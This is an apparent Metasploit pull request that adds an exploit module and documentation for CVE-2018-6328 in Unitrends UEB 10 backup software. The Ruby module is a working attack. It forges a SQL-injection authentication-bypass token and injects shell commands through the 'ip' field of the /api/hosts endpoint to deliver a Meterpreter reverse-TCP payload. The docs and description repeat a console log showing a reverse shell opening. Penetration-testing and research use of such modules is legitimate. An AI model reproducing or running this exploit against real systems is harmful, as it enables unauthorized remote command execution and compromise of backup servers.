### PR TITLE
Unitrends UEB 10 remote exploit - [CVE-2018-6328]

### DIFF
--- a/documentation/modules/exploit/linux/http/ueb10_api_systems.md
+++ b/documentation/modules/exploit/linux/http/ueb10_api_systems.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-  Unitrends UEB 10 http api/storage remote root
+  Unitrends UEB 10 http api/storage rce
 
   This exploit leverages a sqli vulnerability for authentication bypass,
   together with command injection for subsequent RCE.

--- a/documentation/modules/exploit/linux/http/ueb10_api_systems.md
+++ b/documentation/modules/exploit/linux/http/ueb10_api_systems.md
@@ -1,0 +1,44 @@
+## Vulnerable Application
+
+  Unitrends UEB 10 http api/storage remote root
+
+  This exploit leverages a sqli vulnerability for authentication bypass,
+  together with command injection for subsequent RCE.
+
+## Verification Steps
+
+  1. ```use exploit/linux/http/ueb10_api_systems ```
+  2. ```set lhost [IP]```
+  3. ```set rhost [IP]```
+  4. ```exploit```
+  5. A meterpreter session should have been opened successfully
+
+## Scenarios
+
+### UEB 10.0 on CentOS 6.5
+
+```
+msf > use exploit/linux/http/ueb10_api_systems
+msf exploit(linux/http/ueb10_api_systems) > set lhost 15.0.0.177
+lhost => 15.0.0.177
+msf exploit(linux/http/ueb10_api_systems) > set rhost 10.20.1.202
+rhost => 10.20.1.202
+msf exploit(linux/http/ueb10_api_systems) > exploit
+
+[*] Started reverse TCP handler on 15.0.0.177:4444
+[*] 10.20.1.202:443 - pwn'ng ueb 10....
+[*] Command Stager progress -  17.25% done (164/951 bytes)
+[*] Command Stager progress -  34.17% done (325/951 bytes)
+[*] Command Stager progress -  49.84% done (474/951 bytes)
+[*] Command Stager progress -  65.51% done (623/951 bytes)
+[*] Command Stager progress -  80.86% done (769/951 bytes)
+[*] Command Stager progress -  96.85% done (921/951 bytes)
+[*] Command Stager progress - 112.30% done (1068/951 bytes)
+[*] Sending stage (857352 bytes) to 10.20.1.202
+[*] Command Stager progress - 124.92% done (1188/951 bytes)
+[*] Meterpreter session 4 opened (15.0.0.177:4444 -> 10.20.1.202:43475) at 2018-04-27 16:04:42 -0400
+[*] Command Stager progress - 126.60% done (1204/951 bytes)
+
+meterpreter > getuid
+Server username: uid=48, gid=48, euid=48, egid=48
+```

--- a/modules/exploits/linux/http/ueb10_api_systems.rb
+++ b/modules/exploits/linux/http/ueb10_api_systems.rb
@@ -1,0 +1,118 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Unitrends UEB 10 http api/storage remote command execution',
+      'Description'    => %q{
+        It was discovered that the api/storage web interface in Unitrends Backup (UB)
+        before 10.1 has an issue in which one of its input parameters was not validated.
+        A remote attacker could use this flaw to bypass authentication and execute arbitrary
+        commands on the target system.
+      },
+      'Author'         =>
+        [
+          'Cale Smith', # @0xC413
+          'Benny Husted', # @BennyHusted
+          'Jared Arave' # @iotennui
+        ],
+      'DisclosureDate' => 'Mar 14 2018',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'linux',
+      'Arch' => [ARCH_X86],
+      'CmdStagerFlavor' => [ 'printf' ],
+      'References'     =>
+        [
+          ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/000006002'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-6328'],
+          ['URL', 'http://blog.redactedsec.net/exploits/2018/01/29/UEB9.html'],
+          ['EDB', '44297'],
+          ['CVE', '2018-6328'],
+        ],
+      'Targets'        =>
+        [
+          [ 'UEB <= 10.0', { } ]
+        ],
+      'Privileged'     => false,
+      'DefaultOptions' =>
+        {
+         'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
+         'SSL' => true,
+         'PrependFork' => true,
+         'WfsDelay' => 2
+        },
+      'DefaultTarget'   => 0))
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, 'Use SSL', true])
+      ])
+    deregister_options('SRVHOST', 'SRVPORT')
+  end
+
+  def check
+    session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0"  #SQLi auth bypass
+    session = Base64.strict_encode64(session) #b64 encode session token
+
+    res = send_request_cgi!({
+        'method' => 'GET',
+        'uri'    => '/api/systems/details',
+        'ctype'  => 'application/json',
+        'headers' =>
+        {'AuthToken' => session,}
+      })
+    if res && res.code == 200
+      print_good("Good news, looks like a vulnerable version of UEB.")
+      return CheckCode::Appears
+    else
+      print_bad('Host does not appear to be vulnerable.')
+    end
+    return CheckCode::Safe
+
+  end
+
+  #substitue some charactes
+  def filter_bad_chars(cmd)
+    cmd.gsub!("\\", "\\\\\\")
+    cmd.gsub!("'", '\\"')
+  end
+
+  def execute_command(cmd, opts = {})
+
+    session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0"  #SQLi auth bypass
+    session = Base64.strict_encode64(session) #b64 encode session token
+
+    #substitue the cmd into the hostname parameter
+    parms = "{\"name\":\"ffff\",\"ip\":\"10.0.0.200'\\\"`0&#{filter_bad_chars(cmd)}`'\"}"
+    # print_status(parms);
+    res = send_request_cgi({
+      'uri' => '/api/hosts',
+      'method' => 'POST',
+      'ctype'  => 'application/json',
+      'encode_params' => false,
+      'data'   => parms,
+      'headers' =>
+      {'AuthToken' => session,}
+    })
+
+    if res && res.code != 500
+      print_error("Unexpected response")
+    end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+  end
+
+  def exploit
+    print_status("#{peer} - pwn'ng ueb 10....")
+    execute_cmdstager(:linemax => 120)
+
+  end
+end


### PR DESCRIPTION
## Vulnerable Application

  Unitrends UEB 10 http api/storage rce

   Still works on the demo version of the application available here:
   http://free-vmware-backup.unitrends.com/Unitrends-Free-VMware.ova

  This exploit leverages a sqli vulnerability for authentication bypass,
  together with command injection for subsequent RCE.

## Verification Steps

  1. ```use exploit/linux/http/ueb10_api_systems ```
  2. ```set lhost [IP]```
  3. ```set rhost [IP]```
  4. ```exploit```
  5. A meterpreter session should have been opened successfully

## Scenarios

### UEB 10.0 on CentOS 6.5

```
msf > use exploit/linux/http/ueb10_api_systems
msf exploit(linux/http/ueb10_api_systems) > set lhost 15.0.0.177
lhost => 15.0.0.177
msf exploit(linux/http/ueb10_api_systems) > set rhost 10.20.1.202
rhost => 10.20.1.202
msf exploit(linux/http/ueb10_api_systems) > exploit

[*] Started reverse TCP handler on 15.0.0.177:4444
[*] 10.20.1.202:443 - pwn'ng ueb 10....
[*] Command Stager progress -  17.25% done (164/951 bytes)
[*] Command Stager progress -  34.17% done (325/951 bytes)
[*] Command Stager progress -  49.84% done (474/951 bytes)
[*] Command Stager progress -  65.51% done (623/951 bytes)
[*] Command Stager progress -  80.86% done (769/951 bytes)
[*] Command Stager progress -  96.85% done (921/951 bytes)
[*] Command Stager progress - 112.30% done (1068/951 bytes)
[*] Sending stage (857352 bytes) to 10.20.1.202
[*] Command Stager progress - 124.92% done (1188/951 bytes)
[*] Meterpreter session 4 opened (15.0.0.177:4444 -> 10.20.1.202:43475) at 2018-04-27 16:04:42 -0400
[*] Command Stager progress - 126.60% done (1204/951 bytes)

meterpreter > getuid
Server username: uid=48, gid=48, euid=48, egid=48
```
